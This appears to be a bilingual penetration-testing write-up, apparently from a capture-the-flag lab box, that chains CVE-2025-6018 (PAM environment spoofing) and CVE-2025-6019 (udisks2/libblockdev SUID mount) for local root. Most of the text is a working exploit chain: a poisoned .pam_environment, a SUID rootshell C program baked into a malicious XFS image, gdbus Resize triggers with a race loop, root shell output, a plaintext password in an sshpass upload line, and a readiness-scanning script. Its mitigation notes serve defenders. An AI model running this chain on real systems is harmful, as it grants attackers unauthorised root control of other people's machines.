本文介绍了两个Linux系统中的提权漏洞(CVE-2025-6018和CVE-2025-6019)。CVE-2025-6018是一个身份伪装漏洞,涉及PAM环境变量注入,要求目标系统使用Systemd和特定的PAM配置。CVE-2025-6019则是一个本地权限提升漏洞,依赖于libblockdev和udisks2的逻辑缺陷。文章详细阐述了这些漏洞的前提条件、核心原理、利用步骤以及检测和修复方法,辅助渗透测试人员识别和防范这些安全风险。 This article introduces two privilege escalation vulnerabilities in Linux systems (CVE-2025-6018 and CVE-2025-6019). CVE-2025-6018 is an identity spoofing vulnerability involving PAM environment variable injection, requiring the target system to use Systemd and specific PAM configurations. CVE-2025-6019 is a local privilege escalation vulnerability relying on logic flaws in libblockdev and udisks2. The article details the prerequisites, core principles, exploitation steps, as well as detection and remediation methods for these vulnerabilities, assisting penetration testers in identifying and mitigating these security risks.

前提

1. 身份伪装的前提 (针对 CVE-2025-6018)

这是“接力赛”的第一棒,目的是让系统把你从“外来客”识别为“本地人”。

  • 必须是 Systemd 系统:目标必须使用 systemd-logind (Systemd Login Manager,Systemd 登录管理器) 来管理会话。
  • PAM 环境配置权限:你必须对当前用户的家目录有写权限,因为需要创建或修改 ~/.pam_environment 文件。
  • PAM 模块加载:目标系统必须启用了 pam_systemd.so (Pluggable Authentication Modules for Systemd,Systemd 的可插拔身份验证模块)。
  • 重新读取环境:你必须能够触发一次新的会话登录(比如通过 ssh 重新登录或者执行 su - 用户名),以便让系统读取你投毒后的环境变量。

2. 授权许可的前提 (Polkit 的信任)

这是连接两个漏洞的“桥梁”。没有这一步,你无法调用后续的磁盘管理功能。

  • Active 状态:通过 loginctl (Login Control,登录控制工具) 查看时,Active 属性必须为 yes
  • Seat 绑定:会话必须关联到一个具体的 Seat(席位),通常是 seat0 (The primary hardware seat,主硬件席位)。
  • Polkit 策略允许:系统的 Polkit (PolicyKit,系统级权限管理工具包) 策略必须配置为:允许“本地活跃用户”在无需管理员密码的情况下通过 udisks2 (User-space Disk Management Daemon,用户空间磁盘管理守护程序) 操作磁盘。

3. 漏洞触发的前提 (针对 CVE-2025-6019)

这是“接力赛”的终点,真正完成从普通用户到 Root (超级用户) 的跨越。

  • 存在漏洞的库:系统中安装的 libblockdev (Block Device Manipulation Library,块设备操作库) 版本必须在受影响范围内(未打补丁)。
  • 内核支持 XFS:Linux 内核必须加载了 XFS (Extents File System,扩展文件系统) 驱动,否则无法挂载你的恶意镜像。
  • udisks2 服务运行:系统必须运行着 udisks2 守护程序,并且允许你通过 D-Bus (Desktop Bus,桌面总线) 调用它的 Resize (调整大小) 方法。
  • 可写的 /tmp 目录:虽然不是绝对,但漏洞利用通常依赖在 /tmp 目录下创建临时挂载点,且该目录不能有 noexec (禁止执行) 限制。
  • 镜像完整性:你必须拥有一个在本地预先制作好的、带有 SUID (Set User ID,设置用户 ID) 权限二进制文件的 XFS 镜像。

漏洞基本信息

1. 漏洞基本信息 (Vulnerability Overview)

  • CVE-2025-6018:
    • 名称: PAM 环境变量注入漏洞 (Pluggable Authentication Modules Environment Injection)
    • 类型: 逻辑缺陷 / 身份伪装
    • 影响范围: 主要影响 SUSE 系列及配置不当的 Linux 发行版。
  • CVE-2025-6019:
    • 名称: libblockdev / udisks2 逻辑漏洞
    • 类型: 本地权限提升 (LPE - Local Privilege Escalation)
    • 风险等级: 高 (High)

2. 漏洞核心原理 (Root Cause Analysis)

  • CVE-2025-6018 (突破点): 系统中的 pam_env.so (Pluggable Authentication Modules Environment Library) 模块配置了 user_readenv=1。这允许普通用户通过修改家目录下的 ~/.pam_environment 文件注入特定的环境变量。
    • 关键变量: XDG_SEAT (X Display Group Seat) 和 XDG_VTNR (X Display Group Virtual Terminal Number)。
    • 后果: 成功欺骗 Polkit (PolicyKit) 模块,使远程会话被误判为“本地活跃会话” (Active Local Session),从而获得执行敏感系统操作的权限。
  • CVE-2025-6019 (提权点): libblockdev (Block Device Manipulation Library) 在处理 XFS (Extents File System) 文件系统缩放请求时,通过 udisks2 (User-space Disk Management Daemon) 挂载临时镜像。
    • 缺陷: 挂载过程中未设置 MS_NOSUID (Mount Flag: No Set User ID) 标志。
    • 后果: 允许用户挂载包含攻击者构造的 SUID (Set User ID) 程序的文件系统镜像。

3. 提权攻击链构造 (Exploitation Chain)

这一部分是笔记的精华,记录如何将两者串联:

  1. 环境准备: 在 $HOME 创建 .pam_environment,写入伪造的本地席位信息。
  2. 会话重置: 触发 PAM (Pluggable Authentication Modules) 会话重新加载(如通过 SSH 重连)。
  3. 权限校验: 确认 loginctl (Login Control) 将当前用户标记为 Active=yes
  4. 载荷投放: 准备一个恶意的 XFS (Extents File System) 磁盘镜像,内部包含一个具备 SUID (Set User ID) 权限的 Shell。
  5. 触发执行: 使用 udisksctl (User-space Disk Control Tool) 请求修改该镜像大小,系统会自动挂载该镜像,此时执行其中的 SUID 程序即可获取 Root (超级用户) 权限。

4. 渗透测试检查清单 (Pentest Checklist)

  1. 检查 /etc/pam.d/ 下是否存在 user_readenv=1。(如果没有,跳过尝试第二步)
  2. 检查是否存在 ~/.pam_environment 的写权限。(检查env)
  3. 检查 pkexec (PolicyKit Execution) 或 udisksctl (User-space Disk Control Tool) 是否可用。
  4. 检查 libblockdev (Block Device Manipulation Library) 版本是否低于安全补丁版本。

5. 修复与防御 (Mitigation & Defense)

  • 短期策略: 修改 PAM (Pluggable Authentication Modules) 配置,设置 user_readenv=0
  • 长期策略: 更新系统内核及 libblockdevudisks2 关键库。
  • 审计建议: 监控 ~/.pam_environment 文件的异常修改记录。

实例

利用CVE-2025-6018

phileasfogg3@pterodactyl:~> cat .pam_environment

XDG_SEAT OVERRIDE=seat0
XDG_VTNR OVERRIDE=1

重新登录ssh

phileasfogg3@pterodactyl:~> env | grep XDG
XDG_VTNR=1
XDG_SESSION_ID=184
XDG_SESSION_TYPE=tty
XDG_DATA_DIRS=/usr/share
XDG_SESSION_CLASS=user
XDG_SEAT=seat0
XDG_RUNTIME_DIR=/run/user/1002
XDG_CONFIG_DIRS=/etc/xdg

检查SEAT是否为seat0,以及STATE是否为active

phileasfogg3@pterodactyl:~> loginctl --no-pager
SESSION  UID USER         SEAT  TTY   STATE  IDLE SINCE
     20 1002 phileasfogg3 seat0 pts/0 active no

1 sessions listed.

确认Polkit门票

phileasfogg3@pterodactyl:~> pkcheck --action-id org.freedesktop.udisks2.filesystem-mount --process $$ && echo "VULNERABLE: Polkit is bypassed!"

VULNERABLE: Polkit is bypassed!

如果它没有弹出密码输入提示,且直接打印了 VULNERABLE,那么已经拿到了 CVE-2025-6019 的提权通行证。

利用CVE-2025-6019

第一步:在攻击机上制作恶意 XFS 镜像

# 1. 创建一个 300MB 的空镜像文件
dd if=/dev/zero of=xfs.image bs=1M count=300

# 2. 格式化为 XFS (Extents File System,扩展文件系统)
mkfs.xfs xfs.image

# 3. 挂载镜像并植入 SUID Shell 包装器
mkdir -p ./mnt
sudo mount -o loop xfs.image ./mnt

# 4. 编写并编译一个简单的 SUID 提权程序(比直接拷贝 bash 更稳定)
cat << EOF > rootshell.c
#include <unistd.h>
#include <stdlib.h>
int main() {
    setuid(0);
    setgid(0);
    system("/bin/bash -p");
    return 0;
}
EOF
gcc rootshell.c -o ./mnt/rootshell

# 5. 设置关键的 SUID (Set User ID) 权限
sudo chmod 4755 ./mnt/rootshell

# 6. 卸载镜像
sudo umount ./mnt
rm rootshell.c

sudo执行上述文件 上传到目标:sshpass -p '!QAZ2wsx' scp xfs.image phileasfogg3@pterodactyl.htb:/tmp/

第二步:在目标机上触发提权

# 1. 进入 /tmp 目录
cd /tmp

# 2. 设置回环设备 (Loop Device)
# udisksctl: User-space Disk Control Tool (用户空间磁盘控制工具)
LOOP_DEV=$(udisksctl loop-setup --file /tmp/xfs.image --no-user-interaction | grep -o '/dev/loop[0-9]*')
echo "Loop Device: $LOOP_DEV"

# 3. 触发漏洞:利用 gdbus 调用 Resize 方法
# 这会强制 libblockdev (Block Device Manipulation Library) 以含有漏洞的方式挂载镜像
gdbus call --system --dest org.freedesktop.UDisks2 \
    --object-path "/org/freedesktop/UDisks2/block_devices/${LOOP_DEV##*/}" \
    --method org.freedesktop.UDisks2.Filesystem.Resize 0 '{}'

# 4. 寻找挂载点并运行提权程序
# 漏洞触发后,镜像会被挂载在 /tmp/blockdev-xxxx 下
MOUNT_PATH=$(find /tmp -maxdepth 1 -name "blockdev-*" -type d 2>/dev/null)
if [ -z "$MOUNT_PATH" ]; then
    echo "[-] Mount failed, check if you are an Active session."
else
    echo "[+] Found mount at: $MOUNT_PATH"
    $MOUNT_PATH/rootshell
fi

第三步:开启抢夺循环

# 1. 开启极其密集的后台抢夺器
(while true; do 
    target=$(find /tmp -maxdepth 1 -name "blockdev-*" -type d 2>/dev/null)
    if [ -n "$target" ]; then
        echo "[!] MOUNT DETECTED: $target"
        $target/rootshell
        break
    fi
done) &

# 2. 获取抢夺器的进程 ID
SNATCHER_PID=$!

# 3. 重新设置循环设备 (假设使用你上传的镜像)
LOOP_DEV=$(udisksctl loop-setup --file /tmp/xfs.image --no-user-interaction | grep -o '/dev/loop[0-9]*')

# 4. 触发漏洞(多次触发增加成功率)
for i in {1..3}; do
    gdbus call --system --dest org.freedesktop.UDisks2 \
        --object-path "/org/freedesktop/UDisks2/block_devices/${LOOP_DEV##*/}" \
        --method org.freedesktop.UDisks2.Filesystem.Resize 0 '{}'
done

# 5. 如果成功,你会进入 Root Shell;如果不成功,杀掉抢夺器
kill $SNATCHER_PID 2>/dev/null

最后

phileasfogg3@pterodactyl:/tmp> find /tmp/blockdev.* -name "rootshell" -perm -4000 2>/dev/null
/tmp/blockdev.38YCK3/rootshell
phileasfogg3@pterodactyl:/tmp> /tmp/blockdev.38YCK3/rootshell -p
pterodactyl:/tmp # id
uid=0(root) gid=0(root) groups=0(root),100(users)
·1pterodactyl:/tmp # cat /root/root.txt

检测

#!/bin/bash

# --- 颜色定义 ---
RED='\033[0;31m'
GREEN='\033[0;32m'
YELLOW='\033[1;33m'
BLUE='\033[0;34m'
NC='\033[0m' # 无颜色 (No Color)

echo -e "${BLUE}====================================================${NC}"
echo -e "${BLUE}       NeobeeSec 提权前置环境综合扫描器             ${NC}"
echo -e "${BLUE}====================================================${NC}"

# 1. 系统基础信息采集
echo -e "\n${YELLOW}[1] 系统基础信息 (System Information)${NC}"
echo -e "主机名: $(hostname)"
echo -e "内核版本 (Kernel Version): $(uname -r)"
if [ -f /etc/os-release ]; then
    # 全称: Operating System Release (操作系统发行版信息)
    source /etc/os-release
    echo -e "发行版本: $PRETTY_NAME"
fi

# 2. CVE-2025-6018 状态检查 (身份伪装检查)
echo -e "\n${YELLOW}[2] CVE-2025-6018 身份伪装状态 (Environment Poisoning)${NC}"

# 检查环境变量
# 全称: X Display Group Seat (X 显示组席位)
echo -n "XDG_SEAT 状态: "
if [[ "$XDG_SEAT" == "seat0" ]]; then
    echo -e "${GREEN}已设置为 seat0 (符合攻击条件)${NC}"
else
    echo -e "${RED}未设置或非 seat0 (当前值: $XDG_SEAT)${NC}"
fi

# 检查会话活跃度
# 全称: Login Control (登录控制工具)
if command -v loginctl &>/dev/null; then
    ACTIVE_STATUS=$(loginctl show-session "$XDG_SESSION_ID" --property=Active --value 2>/dev/null)
    echo -e "会话活跃状态 (Active Status): ${ACTIVE_STATUS:-Unknown}"
    if [[ "$ACTIVE_STATUS" == "yes" ]]; then
        echo -e "[${GREEN}√${NC}] 会话已激活,Polkit [PolicyKit] 将信任此会话。"
    else
        echo -e "[${RED}!${NC}] 会话非活跃,可能无法调用特权 D-Bus [Desktop Bus] 方法。"
    fi
else
    echo -e "${RED}[x] 找不到 loginctl 工具${NC}"
fi

# 3. 核心库与组件检查
echo -e "\n${YELLOW}[3] 关键组件与包版本 (Software Packages)${NC}"

# 检查工具是否存在
components=("udisksctl" "gdbus" "pkcheck")
for cmd in "${components[@]}"; do
    if command -v "$cmd" &>/dev/null; then
        echo -e "[${GREEN}√${NC}] 发现工具: $cmd"
    else
        echo -e "[${RED}x${NC}] 缺失工具: $cmd"
    fi
done

# 深度检查包版本 (支持 RPM 和 DPKG)
# 全称: Red Hat Package Manager (红帽包管理器)
# 全称: Debian Package (Debian 包管理系统)
check_pkgs=("libblockdev" "udisks2" "polkit" "systemd")

if command -v rpm &>/dev/null; then
    echo -e "\n--- 基于 RPM 的包版本查询 ---"
    for pkg in "${check_pkgs[@]}"; do
        rpm -qa | grep -i "$pkg" | sed "s/^/[+] /"
    done
elif command -v dpkg &>/dev/null; then
    echo -e "\n--- 基于 DPKG 的包版本查询 ---"
    for pkg in "${check_pkgs[@]}"; do
        dpkg -l | grep -i "$pkg" | awk '{print "[+] "$2, $3}'
    done
fi

# 4. CVE-2025-6019 提权前置检查 (磁盘与挂载)
echo -e "\n${YELLOW}[4] CVE-2025-6019 提权前置 (LPE Prerequisites)${NC}"

# 检查内核对 XFS 的支持
# 全称: Extents File System (扩展文件系统)
if grep -q "xfs" /proc/filesystems; then
    echo -e "[${GREEN}√${NC}] 内核支持 XFS 文件系统。"
else
    echo -e "[${RED}x${NC}] 内核不支持 XFS,无法挂载提权镜像。${NC}"
fi

# 检查 /tmp 目录执行权限
# 全称: Standard Output (标准输出)
# 全称: Mount (挂载指令)
if mount | grep -E '\s/tmp\s' | grep -q "noexec"; then
    echo -e "[${RED}x${NC}] /tmp 目录被挂载为 noexec (禁止执行),提权程序可能无法运行。"
else
    echo -e "[${GREEN}√${NC}] /tmp 目录允许执行程序。"
fi

# 5. 权限漏洞盲测 (Polkit 授权检查)
echo -e "\n${YELLOW}[5] Polkit [PolicyKit] 授权盲测${NC}"
# 检查是否可以直接利用 udisks2 (User-space Disk Management Daemon) 挂载权限
if command -v pkcheck &>/dev/null; then
    pkcheck --action-id org.freedesktop.udisks2.filesystem-mount --process $$ &>/dev/null
    if [ $? -eq 0 ]; then
        echo -e "[${GREEN}√${NC}] 授权成功: 你可以直接挂载文件系统!"
    else
        echo -e "[${RED}x${NC}] 授权失败: 挂载操作需要管理员密码。"
    fi
fi

echo -e "\n${BLUE}====================================================${NC}"
echo -e "扫描完成。如果以上带 [√] 的项目较多,说明提权成功率极高。"

 

Prerequisites

1. Prerequisites for Identity Spoofing (for CVE-2025-6018)

This is the first leg of the "relay race", aiming to make the system recognize you as a "local" instead of an "outsider".

  • Must be a Systemd system: The target must use systemd-logind (Systemd Login Manager) to manage sessions.
  • PAM Environment Configuration Permissions: You must have write permissions to the current user's home directory because you need to create or modify the ~/.pam_environment file.
  • PAM Module Loading: The target system must have pam_systemd.so (Pluggable Authentication Modules for Systemd) enabled.
  • Re-read Environment: You must be able to trigger a new session login (e.g., by re-logging in via ssh or executing su - username) so that the system reads your poisoned environment variables.

2. Prerequisites for Authorization (Polkit's Trust)

This is the "bridge" connecting the two vulnerabilities. Without this step, you cannot invoke subsequent disk management functions.

  • Active Status: When viewed via loginctl (Login Control), the Active attribute must be yes.
  • Seat Binding: The session must be associated with a specific Seat, typically seat0 (the primary hardware seat).
  • Polkit Policy Allowance: The system's Polkit (PolicyKit) policy must be configured to allow "local active users" to operate disks via udisks2 (User-space Disk Management Daemon) without requiring an administrator password.

3. Prerequisites for Vulnerability Triggering (for CVE-2025-6019)

This is the finish line of the "relay race", truly completing the leap from an ordinary user to Root (superuser).

  • Vulnerable Library: The version of libblockdev (Block Device Manipulation Library) installed on the system must be within the affected range (unpatched).
  • Kernel Support for XFS: The Linux kernel must have the XFS (Extents File System) driver loaded; otherwise, your malicious image cannot be mounted.
  • udisks2 Service Running: The system must be running the udisks2 daemon and allow you to invoke its Resize method via D-Bus (Desktop Bus).
  • Writable /tmp Directory: Although not absolute, exploitation typically relies on creating temporary mount points under the /tmp directory, and this directory must not have the noexec (no execution) restriction.
  • Image Integrity: You must have a locally pre-built XFS image containing a binary file with SUID (Set User ID) permissions.

Vulnerability Overview

1. Vulnerability Overview

  • CVE-2025-6018:
    • Name: PAM Environment Variable Injection Vulnerability
    • Type: Logical Flaw / Identity Spoofing
    • Scope of Impact: Primarily affects SUSE series and misconfigured Linux distributions.
  • CVE-2025-6019:
    • Name: libblockdev / udisks2 Logical Vulnerability
    • Type: Local Privilege Escalation (LPE)
    • Risk Level: High

2. Root Cause Analysis

  • CVE-2025-6018 (Breakthrough): The system's pam_env.so (Pluggable Authentication Modules Environment Library) module is configured with user_readenv=1. This allows ordinary users to inject specific environment variables by modifying the ~/.pam_environment file in their home directory.
    • Key Variables: XDG_SEAT (X Display Group Seat) and XDG_VTNR (X Display Group Virtual Terminal Number).
    • Consequence: Successfully deceives the Polkit (PolicyKit) module, causing remote sessions to be misidentified as "active local sessions", thereby gaining permission to perform sensitive system operations.
  • CVE-2025-6019 (Privilege Escalation Point): libblockdev (Block Device Manipulation Library), when handling XFS (Extents File System) filesystem resize requests, mounts a temporary image via udisks2 (User-space Disk Management Daemon).
    • Flaw: The mount process does not set the MS_NOSUID (Mount Flag: No Set User ID) flag.
    • Consequence: Allows users to mount a filesystem image containing an attacker-crafted SUID (Set User ID) program.

3. Exploitation Chain Construction

This section is the essence of the notes, detailing how to chain the two together:

  1. Environment Preparation: Create .pam_environment in $HOME with forged local seat information.
  2. Session Reset: Trigger a PAM (Pluggable Authentication Modules) session reload (e.g., by reconnecting via SSH).
  3. Permission Verification: Confirm that loginctl (Login Control) marks the current user as Active=yes.
  4. Payload Deployment: Prepare a malicious XFS (Extents File System) disk image locally, containing a shell with SUID (Set User ID) permissions.
  5. Trigger Execution: Use udisksctl (User-space Disk Control Tool) to request resizing this image; the system will automatically mount it, and executing the SUID program inside grants Root (superuser) privileges.

4. Penetration Test Checklist

  1. Check if user_readenv=1 exists under /etc/pam.d/. (If not, skip attempting step 2)
  2. Check for write permissions to ~/.pam_environment. (check env)
  3. Check if pkexec (PolicyKit Execution) or udisksctl (User-space Disk Control Tool) is available.
  4. Check if the libblockdev (Block Device Manipulation Library) version is below the patched security version.

5. Mitigation and Defense

  • Short-term Strategy: Modify PAM (Pluggable Authentication Modules) configuration to set user_readenv=0.
  • Long-term Strategy: Update the system kernel and critical libraries such as libblockdev and udisks2.
  • Audit Recommendations: Monitor for anomalous modification records of the ~/.pam_environment file.

Examples

Exploiting CVE-2025-6018

phileasfogg3@pterodactyl:~> cat .pam_environment

XDG_SEAT OVERRIDE=seat0
XDG_VTNR OVERRIDE=1

Re-login via SSH

phileasfogg3@pterodactyl:~> env | grep XDG
XDG_VTNR=1
XDG_SESSION_ID=184
XDG_SESSION_TYPE=tty
XDG_DATA_DIRS=/usr/share
XDG_SESSION_CLASS=user
XDG_SEAT=seat0
XDG_RUNTIME_DIR=/run/user/1002
XDG_CONFIG_DIRS=/etc/xdg

Check if SEAT is seat0 and STATE is active

phileasfogg3@pterodactyl:~> loginctl --no-pager
SESSION  UID USER         SEAT  TTY   STATE  IDLE SINCE
     20 1002 phileasfogg3 seat0 pts/0 active no

1 sessions listed.

Confirm Polkit ticket

phileasfogg3@pterodactyl:~> pkcheck --action-id org.freedesktop.udisks2.filesystem-mount --process $$ && echo "VULNERABLE: Polkit is bypassed!"

VULNERABLE: Polkit is bypassed!

If it does NOT prompt for a password and directly prints VULNERABLE, then you have obtained the privilege escalation ticket for CVE-2025-6019.

Exploiting CVE-2025-6019

Step 1: Create a malicious XFS image on the attacking machine

# 1. Create a 300MB empty image file
dd if=/dev/zero of=xfs.image bs=1M count=300

# 2. Format as XFS (Extents File System)
mkfs.xfs xfs.image

# 3. Mount the image and implant the SUID Shell wrapper
mkdir -p ./mnt
sudo mount -o loop xfs.image ./mnt

# 4. Write and compile a simple SUID privilege escalation program (more stable than copying bash directly)
cat << EOF > rootshell.c
#include <unistd.h>
#include <stdlib.h>
int main() {
    setuid(0);
    setgid(0);
    system("/bin/bash -p");
    return 0;
}
EOF
gcc rootshell.c -o ./mnt/rootshell

# 5. Set the critical SUID (Set User ID) permission
sudo chmod 4755 ./mnt/rootshell

# 6. Unmount the image
sudo umount ./mnt
rm rootshell.c

Execute the above file with sudo. Upload to target: sshpass -p '!QAZ2wsx' scp xfs.image phileasfogg3@pterodactyl.htb:/tmp/

Step 2: Trigger privilege escalation on the target machine

# 1. Enter the /tmp directory
cd /tmp

# 2. Set up the loop device
# udisksctl: User-space Disk Control Tool
LOOP_DEV=$(udisksctl loop-setup --file /tmp/xfs.image --no-user-interaction | grep -o '/dev/loop[0-9]*')
echo "Loop Device: $LOOP_DEV"

# 3. Trigger the vulnerability: Use gdbus to call the Resize method
# This forces libblockdev (Block Device Manipulation Library) to mount the image in a vulnerable way
gdbus call --system --dest org.freedesktop.UDisks2 \
    --object-path "/org/freedesktop/UDisks2/block_devices/${LOOP_DEV##*/}" \
    --method org.freedesktop.UDisks2.Filesystem.Resize 0 '{}'

# 4. Find the mount point and run the privilege escalation program
# After the vulnerability is triggered, the image will be mounted under /tmp/blockdev-xxxx
MOUNT_PATH=$(find /tmp -maxdepth 1 -name "blockdev-*" -type d 2>/dev/null)
if [ -z "$MOUNT_PATH" ]; then
    echo "[-] Mount failed, check if you are an Active session."
else
    echo "[+] Found mount at: $MOUNT_PATH"
    $MOUNT_PATH/rootshell
fi

Step 3: Start the snatching loop

# 1. Start an extremely intensive background snatcher
(while true; do 
    target=$(find /tmp -maxdepth 1 -name "blockdev-*" -type d 2>/dev/null)
    if [ -n "$target" ]; then
        echo "[!] MOUNT DETECTED: $target"
        $target/rootshell
        break
    fi
done) &

# 2. Get the snatcher's process ID
SNATCHER_PID=$!

# 3. Re-setup the loop device (assuming you uploaded the image)
LOOP_DEV=$(udisksctl loop-setup --file /tmp/xfs.image --no-user-interaction | grep -o '/dev/loop[0-9]*')

# 4. Trigger the vulnerability (multiple triggers increase success rate)
for i in {1..3}; do
    gdbus call --system --dest org.freedesktop.UDisks2 \
        --object-path "/org/freedesktop/UDisks2/block_devices/${LOOP_DEV##*/}" \
        --method org.freedesktop.UDisks2.Filesystem.Resize 0 '{}'
done

# 5. If successful, you will get a Root Shell; if not, kill the snatcher
kill $SNATCHER_PID 2>/dev/null

Finally

phileasfogg3@pterodactyl:/tmp> find /tmp/blockdev.* -name "rootshell" -perm -4000 2>/dev/null
/tmp/blockdev.38YCK3/rootshell
phileasfogg3@pterodactyl:/tmp> /tmp/blockdev.38YCK3/rootshell -p
pterodactyl:/tmp # id
uid=0(root) gid=0(root) groups=0(root),100(users)
·1pterodactyl:/tmp # cat /root/root.txt

Detection

#!/bin/bash

# --- Color Definitions ---
RED='\033[0;31m'
GREEN='\033[0;32m'
YELLOW='\033[1;33m'
BLUE='\033[0;34m'
NC='\033[0m' # No Color

echo -e "${BLUE}====================================================${NC}"
echo -e "${BLUE}       NeobeeSec Privilege Escalation Pre-check Scanner             ${NC}"
echo -e "${BLUE}====================================================${NC}"

# 1. System Basic Information Collection
echo -e "\n${YELLOW}[1] System Basic Information (System Information)${NC}"
echo -e "Hostname: $(hostname)"
echo -e "Kernel Version: $(uname -r)"
if [ -f /etc/os-release ]; then
    # Full name: Operating System Release
    source /etc/os-release
    echo -e "Distribution: $PRETTY_NAME"
fi

# 2. CVE-2025-6018 Status Check (Identity Spoofing Check)
echo -e "\n${YELLOW}[2] CVE-2025-6018 Identity Spoofing Status (Environment Poisoning)${NC}"

# Check environment variables
# Full name: X Display Group Seat
echo -n "XDG_SEAT Status: "
if [[ "$XDG_SEAT" == "seat0" ]]; then
    echo -e "${GREEN}Set to seat0 (meets attack conditions)${NC}"
else
    echo -e "${RED}Not set or not seat0 (current value: $XDG_SEAT)${NC}"
fi

# Check session activity
# Full name: Login Control
if command -v loginctl &>/dev/null; then
    ACTIVE_STATUS=$(loginctl show-session "$XDG_SESSION_ID" --property=Active --value 2>/dev/null)
    echo -e "Session Active Status: ${ACTIVE_STATUS:-Unknown}"
    if [[ "$ACTIVE_STATUS" == "yes" ]]; then
        echo -e "[${GREEN}√${NC}] Session is active, Polkit [PolicyKit] will trust this session."
    else
        echo -e "[${RED}!${NC}] Session is inactive, may not be able to call privileged D-Bus [Desktop Bus] methods."
    fi
else
    echo -e "${RED}[x] loginctl tool not found${NC}"
fi

# 3. Core Libraries and Components Check
echo -e "\n${YELLOW}[3] Key Components and Package Versions (Software Packages)${NC}"

# Check if tools exist
components=("udisksctl" "gdbus" "pkcheck")
for cmd in "${components[@]}"; do
    if command -v "$cmd" &>/dev/null; then
        echo -e "[${GREEN}√${NC}] Tool found: $cmd"
    else
        echo -e "[${RED}x${NC}] Missing tool: $cmd"
    fi
done

# Deep check package versions (supports RPM and DPKG)
# Full name: Red Hat Package Manager
# Full name: Debian Package
check_pkgs=("libblockdev" "udisks2" "polkit" "systemd")

if command -v rpm &>/dev/null; then
    echo -e "\n--- RPM-based package version query ---"
    for pkg in "${check_pkgs[@]}"; do
        rpm -qa | grep -i "$pkg" | sed "s/^/[+] /"
    done
elif command -v dpkg &>/dev/null; then
    echo -e "\n--- DPKG-based package version query ---"
    for pkg in "${check_pkgs[@]}"; do
        dpkg -l | grep -i "$pkg" | awk '{print "[+] "$2, $3}'
    done
fi

# 4. CVE-2025-6019 Privilege Escalation Pre-check (Disk and Mount)
echo -e "\n${YELLOW}[4] CVE-2025-6019 Privilege Escalation Pre-check (LPE Prerequisites)${NC}"

# Check kernel support for XFS
# Full name: Extents File System
if grep -q "xfs" /proc/filesystems; then
    echo -e "[${GREEN}√${NC}] Kernel supports XFS filesystem."
else
    echo -e "[${RED}x${NC}] Kernel does not support XFS, cannot mount escalation image.${NC}"
fi

# Check /tmp directory execute permissions
# Full name: Standard Output
# Full name: Mount
if mount | grep -E '\s/tmp\s' | grep -q "noexec"; then
    echo -e "[${RED}x${NC}] /tmp directory is mounted as noexec (execution forbidden), escalation program may not run."
else
    echo -e "[${GREEN}√${NC}] /tmp directory allows program execution."
fi

# 5. Permission Vulnerability Blind Test (Polkit Authorization Check)
echo -e "\n${YELLOW}[5] Polkit [PolicyKit] Authorization Blind Test${NC}"
# Check if can directly use udisks2 (User-space Disk Management Daemon) mount permissions
if command -v pkcheck &>/dev/null; then
    pkcheck --action-id org.freedesktop.udisks2.filesystem-mount --process $$ &>/dev/null
    if [ $? -eq 0 ]; then
        echo -e "[${GREEN}√${NC}] Authorization successful: You can mount filesystems directly!"
    else
        echo -e "[${RED}x${NC}] Authorization failed: Mount operation requires administrator password."
    fi
fi

echo -e "\n${BLUE}====================================================${NC}"
echo -e "Scan complete. If many items marked with [√] above, the privilege escalation success rate is extremely high."